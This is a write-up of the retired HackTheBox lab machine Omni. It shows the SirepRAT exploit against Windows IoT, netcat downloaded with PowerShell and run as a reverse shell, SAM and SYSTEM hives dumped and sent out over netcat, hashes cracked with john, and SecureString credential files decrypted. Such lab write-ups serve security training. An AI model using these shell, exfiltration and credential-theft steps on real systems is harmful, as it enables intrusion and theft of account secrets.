HTB: Omni

Posted on 07 Feb 2021 in security • 7 min read

Omni Card

This is a writeup about a retired HacktheBox machine: Omni publish on August 22, 2020 by egre55. This box is rated as easy box. I was mostly intrigue by the "Other" operating system. It implies some Google search, a RAT and SecureStrings.



Let us start as always by a nmap scan. The box is quit busy so first of all we run a simple aggressive TCP scan:

# Nmap 7.80 scan initiated Mon Aug 31 11:13:25 2020 as: nmap -p- -oN nmap -sSV
Nmap scan report for
Host is up (0.079s latency).
Not shown: 65529 filtered ports
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

This look like a Windows Server with some strange open ports. When trying to access the web service on port 8080 we got a basic auth with the message "Windows Device Portal". We google to find the default user and password administrator:p@ssw0rd but they don't work here. So we google for just "Windows Device Portal".

We learn that this is a Windows IOT operating system. We search for "Windows IOT exploit" but that lead us to a lot of general media article. So we specify our search to "Windows IOT exploit github". We found some python code to exploit the Sirep service.

RCE and reverse shell

We install the python2 dependencies and quickly realize that there is a bug with the enum library. A few Google search told us that we need to use the aenum library instead of enum So we modify each from enum import Enum to from aenum import Enum.

Then we can use the tool to execute command on the system. After a few classic commands we upload netcat (/usr/share/windows-binaries/nc.exe) to the box using the python HTTP server (python3 -m http.server) and writing it directly in C:\. Then we run it to get a reverse shell, but this trigger an error as out netcat is a 32bits binary.

python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c PowerShell Invoke-WebRequest -OutFile C:\\nc.exe -Uri" --v

kali@kali:~/SirepRAT$ python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c C:\\nc.exe 1234 -e cmd.exe" --v---------
This version of C:\nc.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

We download nc64.exe from the internet, re-upload it and run it again.

kali@kali:~/pown/htb_omni/SirepRAT$ python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c PowerShell Invoke-WebRequest -OutFile C:\\nc64.exe -Uri"
kali@kali:~/pown/htb_omni/SirepRAT$ python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c C:\\nc64.exe 1234 -e cmd.exe"

We run a netcat listener at the same time and get a shell as NT/SYTSEM

kali@kali:/tmp/srv$ nc -l -p 1234
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>echo %username% 
echo %username%

Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

As we are system we could access all file on the system. We found user.txt and root.txt in C:\Data\Users\app and C:\Data\Users\Adminsitrator but the content of the file is an Encrypted String. We will need to be the app and administrator users to decrypt the files. We also notice the hardening.txt and iot-admin.xml files. The first one is just a text file with some (unimportant) informations about the box's configuration. The second one seems to be the administrator user's password as an Encrypted String. So once we are the app user we would quickly be able to get the user flag and the administrator password.

C:\windows\system32>cd C:\Data
cd C:\Data

Volume in drive C is MainOS
Volume Serial Number is 3C37-C677

Directory of C:\Data

10/26/2018  11:37 PM    <DIR>          CrashDump
07/04/2020  12:22 AM                 0 FirstBoot.Complete
10/26/2018  11:37 PM    <DIR>          Logfiles
10/26/2018  11:37 PM    <DIR>          Programs
07/03/2020  11:22 PM    <DIR>          SharedData
07/03/2020  11:22 PM    <DIR>          SystemData
10/26/2018  11:38 PM    <DIR>          test
07/04/2020  07:28 PM    <DIR>          Users
10/26/2018  11:38 PM    <DIR>          Windows
              1 File(s)              0 bytes
              8 Dir(s)   4,691,017,728 bytes free

C:\Data>cd Users\app
cd Users\app

Volume in drive C is MainOS
Volume Serial Number is 3C37-C677

Directory of C:\Data\Users\app

07/04/2020  09:53 PM    <DIR>          .
07/04/2020  09:53 PM    <DIR>          ..
07/04/2020  07:28 PM    <DIR>          3D Objects
07/04/2020  07:28 PM    <DIR>          Documents
07/04/2020  07:28 PM    <DIR>          Downloads
07/04/2020  07:28 PM    <DIR>          Favorites
07/04/2020  08:20 PM               344 hardening.txt
07/04/2020  08:14 PM             1,858 iot-admin.xml
07/04/2020  07:28 PM    <DIR>          Music
07/04/2020  07:28 PM    <DIR>          Pictures
07/04/2020  09:53 PM             1,958 user.txt
07/04/2020  07:28 PM    <DIR>          Videos
              3 File(s)          4,160 bytes
              9 Dir(s)   4,691,017,728 bytes free

C:\Data\Users\app>type hardening
type hardening
The system cannot find the file specified.

C:\Data\Users\app>type hardening.txt
type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group

Dumping hashes

As we are SYSTEM we can dump the SYSTEM and SAM hive to extract the users passwords' hashes with reg save. We then transfer them to our Kali box using netcat.

C:\windows\system32>reg save hklm\system C:\system
reg save hklm\system C:\system
The operation completed successfully.

C:\windows\system32> reg save hklm\sam c:\sam
reg save hklm\sam c:\sam
The operation completed successfully.

C:\windows\system32>cd c:\
cd c:\

c:\>nc64.exe 1235 < system
nc64.exe 1235 < system

c:\>nc64.exe 1235 < sam
nc64.exe 1235 < sam

Cracking hashes

Once transfered we use impacket's secret dump to extract the hashes from the SAM and SYSTEM files.

kali@kali:~/installed_tools/impacket/examples$ python3 -sam ~/pown/sam -system ~/pown/system -outputfile out LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Cleaning up...

We run john on the collected hashes and get the app user password.

[maggick@fomalhaut htb_omni]$ john hash -w=~/tools/password_lists/rockyou.txt --fork=8 --rules --format=NT
Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Node numbers 1-8 of 8 (fork)
Each node loaded 1/8 of wordfile to memory (about 16 MB/node)
Press 'q' or Ctrl-C to abort, almost any other key for status
mesh5143         (app)
7 1g 0:00:00:09 DONE (2020-08-28 11:14) 0.1009g/s 2951Kp/s 2951Kc/s 14755KC/s Aateetaing..Aaaaaaaaaaaawing
5 1g 0:00:00:09 DONE (2020-08-28 11:14) 0.1005g/s 2939Kp/s 2939Kc/s 14769KC/s Abbyramying..Aaaaaaaaaaaaing
2 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2921Kp/s 2921Kc/s 17530KC/s Aanyahing..Aaaaaaaaaaaaaaaaaaaaaaaaain
6 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2921Kp/s 2921Kc/s 17529KC/s Abdelaing..Aaaaazing
4 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2912Kp/s 2912Kc/s 17475KC/s Aberdaying..Aaaaaaaaaaaaaaaing
3 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2909Kp/s 2909Kc/s 17456KC/s Abgboing..Aaaaaaaaaaaaaaaaaaaaaing
8 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2897Kp/s 2897Kc/s 17382KC/s Abeloliving..Aaaaaaaaaaaaaaaaaaaaaaaaaaa
1 0g 0:00:00:10 DONE (2020-08-28 11:14) 0g/s 2855Kp/s 2855Kc/s 17130KC/s Abigayling..Soleiling

We then connect to the web service on port 8080 using this credentials. There is specific page to run command.

User interface

We just run netcat to get a reverse shell as app

kali@kali:~$ nc -l -p 1234
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>echo %username%

Encrypted Strings

We go back to the app's user data folder, and use Microsoft documentation to decrypt the user flag.

C:\windows\system32>cd C:\Data\Users\app

C:\Data\Users\app>type user.txt
type user.txt
<Objs Version="" xmlns="">
  <Obj RefId="0">
    <TN RefId="0">
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Data\Users\app> $Secure2 = ConvertTo-SecureString -String '01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7'

PS C:\Data\Users\app> $credential = New-Object System.Management.Automation.PSCredential ('root', $Secure2)
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password


We do exactly the same with the iot-admin.xml file to retrieve the administrator password.

C:\Data\Users\app>type iot-admin.xml
type iot-admin.xml
<Objs Version="" xmlns="">
  <Obj RefId="0">
    <TN RefId="0">
      <S N="UserName">omni\administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27</SS>
PS C:\Data\Users\app> $Secure2 = ConvertTo-SecureString -String '01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27'
PS C:\Data\Users\app> $credential = New-Object System.Management.Automation.PSCredential ('root', $Secure2)
$credential = New-Object System.Management.Automation.PSCredential ('root', $Secure2)
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password

We once more connect to the web application on port 8080 and execute netcat to get a reverse shell as administrator. And we use the above method to decrypt the root flag.

kali@kali:~$ nc -l -p 1234
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>echo %username%
echo %username%

C:\windows\system32>cd "C:\Data\Users\administrator\
cd "C:\Data\Users\administrator\

Volume in drive C is MainOS
Volume Serial Number is 3C37-C677

Directory of C:\Data\Users\administrator

07/04/2020  09:48 PM    <DIR>          .
07/04/2020  09:48 PM    <DIR>          ..
07/03/2020  11:23 PM    <DIR>          3D Objects
07/03/2020  11:23 PM    <DIR>          Documents
07/03/2020  11:23 PM    <DIR>          Downloads
07/03/2020  11:23 PM    <DIR>          Favorites
07/03/2020  11:23 PM    <DIR>          Music
07/03/2020  11:23 PM    <DIR>          Pictures
07/04/2020  09:48 PM             1,958 root.txt
07/03/2020  11:23 PM    <DIR>          Videos
              1 File(s)          1,958 bytes
              9 Dir(s)   4,691,116,032 bytes free

C:\Data\Users\administrator>type root.txt
type root.txt
<Objs Version="" xmlns="">
  <Obj RefId="0">
    <TN RefId="0">
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Data\Users\administrator> $Secure2 = ConvertTo-SecureString -String '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7'
PS C:\Data\Users\administrator> $credential = New-Object System.Management.Automation.PSCredential ('root', $Secure2)
PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Password

Wrapping up

I was really intrigued by the Unknown operating system but it turns out it was a simple guessing game and once you know what the operating system was the box was really straightforward (if you don't mess up the heavy SYSTEM extraction as I did). This is clearly one of the worst box created by egre55 even if the fact to use Windows IOT is quit "funny".